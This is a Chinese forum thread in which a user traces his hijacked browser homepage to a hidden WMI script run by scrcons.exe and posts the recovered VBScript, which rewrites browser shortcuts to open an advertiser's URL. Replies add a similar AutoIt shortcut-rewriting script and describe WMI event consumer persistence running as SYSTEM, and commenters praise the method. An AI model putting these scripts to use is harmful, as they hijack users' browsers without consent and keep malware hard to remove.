haijie1223 发表于 2016-7-5 18:20:00

非常隐蔽的自动修改主页

本帖最后由 haijie1223 于 2016-7-5 18:21 编辑

这几天电脑总是莫名其妙的自己修改主页,我每次自己修改完之后,当时是没有问题的,可是不知道什么时间又自己变了。
查找了好久也没有找到有什么恶意软件。又不能为了这么一个修改主页去重做系统,几乎所有的软件都是我常用的,不可能有恶意行为。的确很难找出元凶。
于是对进程进行了跟踪,然后写了个代码不停的检测主页。检测到主页修改,马上播放一首音乐提醒。
设置好了然后去看电视了,没一会媳妇过来问我,电脑怎么自己唱起歌来了。
兴奋之余立马查看进程,结果是一个文件名为scrcons.exe的进程搞的鬼。但是仔细看了一下,这个进程似乎不是一个恶意程序。
马上百度这个进程名字,发现有解决之法。
具体方法自己百度吧,我把揪出来的代码发一下,为了赚这点点击费用,作者也是蛮拼的,想设置主页光明正大的,何必这么偷偷摸摸,让人心烦!
我把他的主页用xxxx代替吧,省的有做广告之嫌。On Error Resume Next:
Const link = "http://xxxxx.com/":
Const link360 = "http://xxxxx.com/s=3":
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):
Set oDic = CreateObject("scripting.dictionary"):
For Each browser In browsersArr:
oDic.Add LCase(browser), browser:
Next:
lnkpathsArr = split(lnkpaths,","):
Set oFolders = CreateObject("scripting.dictionary"):
For Each lnkpath In lnkpathsArr:
oFolders.Add lnkpath, lnkpath:
Next:
Set fso = CreateObject("Scripting.Filesystemobject"):
Set WshShell = CreateObject("Wscript.Shell"):
For Each oFolder In oFolders:
If fso.FolderExists(oFolder) Then:
For Each file In fso.GetFolder(oFolder).Files:
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:
Set oShellLink = WshShell.CreateShortcut(file.Path):
path = oShellLink.TargetPath:
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):
If oDic.Exists(LCase(name)) Then:
If LCase(name) = LCase("360se.exe") Then:
oShellLink.Arguments = link360:
Else:
oShellLink.Arguments = link:
End If:
If file.Attributes And 1 Then:
file.Attributes = file.Attributes - 1:
End If:
oShellLink.Save:
End If:
End If:
Next:
End If:
Next:

绿色风 发表于 2016-7-5 20:00:16

大赞!!!!!

zch11230 发表于 2016-7-5 21:26:32

但是不得不说这种思路值得赞一个
支持所有浏览器
管你什么卫士,什么管家,什么毒霸,都“保护”不了
技术上更简单。

user11 发表于 2016-9-12 21:45:06

我当年是这样干的,但是我记得360会报修改桌面快捷方式~!!



Global $IEReg1 = "HKEY_CURRENT_USER\Software\Microsoft\"
Global $IEReg2 = "HKEY_CURRENT_MACHINE\Software\Microsoft\"
Global $IE = "http://www.baidu.com/?test"
Global $Desktop = @DesktopDir & "\上网导航.url"




Func iehome()

        $Homepage = RegRead($IEReg1 & "Internet Explorer\Main", "Start Page")

        $names = "2345王牌浏览器.lnk|UC浏览器|2345智能浏览器.lnk|傲游浏览器.lnk|2345加速浏览器.lnk|猎豹浏览器.lnk|Google Chrome 浏览器.lnk|Google Chrome.lnk|Maxthon.lnk|Mozilla Firefox.lnk|Launch Internet Explorer Browser.lnk|启动 Internet Explorer 浏览器.lnk|Internet Explorer.lnk|360极速浏览器.lnk|安全浏览器.lnk|360浏览器.lnk|360安全浏览器.lnk|Opera.lnk|网址导航.lnk|Firefox.lnk|搜狗高速浏览器.lnk|百度浏览器.lnk|QQ浏览器.lnk"
        $names1 = StringSplit($names, "|")


        If $Homepage <> $IE Then

                $szhg = MsgBox(68, "设置主页", "是否设置**** 作为IE浏览器主页?" & @CRLF & @CRLF & "设置后,将永不出现本提示!")

                If $szhg = 6 Then
                        RegWrite($IEReg1 & "Internet Explorer\Main", "Start Page", "REG_SZ", $IE)
                        RegWrite($IEReg1 & "Internet Explorer\Main", "Default_Page_URL", "REG_SZ", $IE)
                        RegWrite($IEReg2 & "Internet Explorer\Main", "Start Page", "REG_SZ", $IE)
                        RegWrite($IEReg2 & "Internet Explorer\Main", "Default_Page_URL", "REG_SZ", $IE)
                        RegWrite($IEReg2 & "Internet Explorer\Main", "First Home Page", "REG_SZ", $IE)
                Else

                       
                        ;;==>>>>>>创建快捷方式=

                        For $i = 1 To $names1

                                $lnkpath1 = @DesktopDir & "\" & $names1[$i]
                                $lnkpath2 = @DesktopCommonDir & "\" & $names1[$i]
                                $lnkpath3 = @AppDataDir & "\Microsoft\Internet Explorer\Quick Launch\" & $names1[$i]


                                If FileExists($lnkpath1) Then
                                        modifylnk($lnkpath1)
                                EndIf
                                If FileExists($lnkpath2) Then
                                        modifylnk($lnkpath2)
                                EndIf
                                If FileExists($lnkpath3) Then
                                        modifylnk($lnkpath3)
                                EndIf

                        Next

                EndIf
               

               

        EndIf



EndFunc   ;==>iehome


Func modifylnk($lnkpath)

        $Ddetails = FileGetShortcut($lnkpath)

        If $Ddetails <> $IE Then
                If StringInStr(FileGetAttrib($lnkpath), "R") Then
                        FileSetAttrib($lnkpath, "-R")
                EndIf
                $mok = FileCreateShortcut($Ddetails, $lnkpath, $Ddetails, $IE, $Ddetails, $Ddetails, "", $Ddetails, $Ddetails)
                FileSetAttrib($lnkpath, "+R")
        EndIf

EndFunc   ;==>modifylnk


heroxianf 发表于 2016-9-13 17:55:19

回复 4# user11


    确实很牛虻~

cashiba 发表于 2016-9-22 10:31:34

class ActiveScriptEventConsumer : __EventConsumer
{
uint8 CreatorSID = {1,1,0,0,0,0,0,5,18,0,0,0}; //事件消费者的CreatorSID 只读
uint32 KillTimeout = 0; //脚本允许被执行的时间 默认为0,脚本不会被终止
string MachineName;
uint32 MaximumQueueSize;
string Name; //自定义的事件消费者的名字。
string ScriptingEngine; //用于解释脚本的脚本引擎。VBScript或者JScript
string ScriptFileName; //从一个文件里面读取想执行的脚本
string ScriptText; //用于执行的脚本代码。
};
自定义的脚本运行时,是由系统自带的scrcons.exe作为脚本宿主进行解析,而scrcons.exe是由系统以 SYSTEM权限启动的,也就是说,我们的脚本是以SYSTEM权限执行,并且其所创建的任意进程都会继承SYSTEM权限。美中不足的就是,每当脚本执 行时,会平白多出一个scrcons.exe的系统进程。这也是这个脚本后门目前最容易被发现的一个弱点。不过,当这个脚本24小时才运行一次时,有多少 人会注意到呢?原来Trojan就是这样子不能被干掉的....

coolijoanne 发表于 2016-9-30 08:33:44

好厲害!!佩服至極!

老鹰系统盘 发表于 2016-11-24 18:53:09

看看下载了

xiaonox 发表于 2016-12-10 18:41:45

学习了的确简单粗暴

sunkiss 发表于 2016-12-22 21:39:21

都是高手啊~!哈哈

hjq766 发表于 2017-5-6 16:20:10

支持,进来学习下

smile1977 发表于 2019-9-21 20:37:07

学习了的确简单粗暴

sunyelover 发表于 2019-9-30 02:06:09

这个 厉害了!!!
页: [1]
查看完整版本: 非常隐蔽的自动修改主页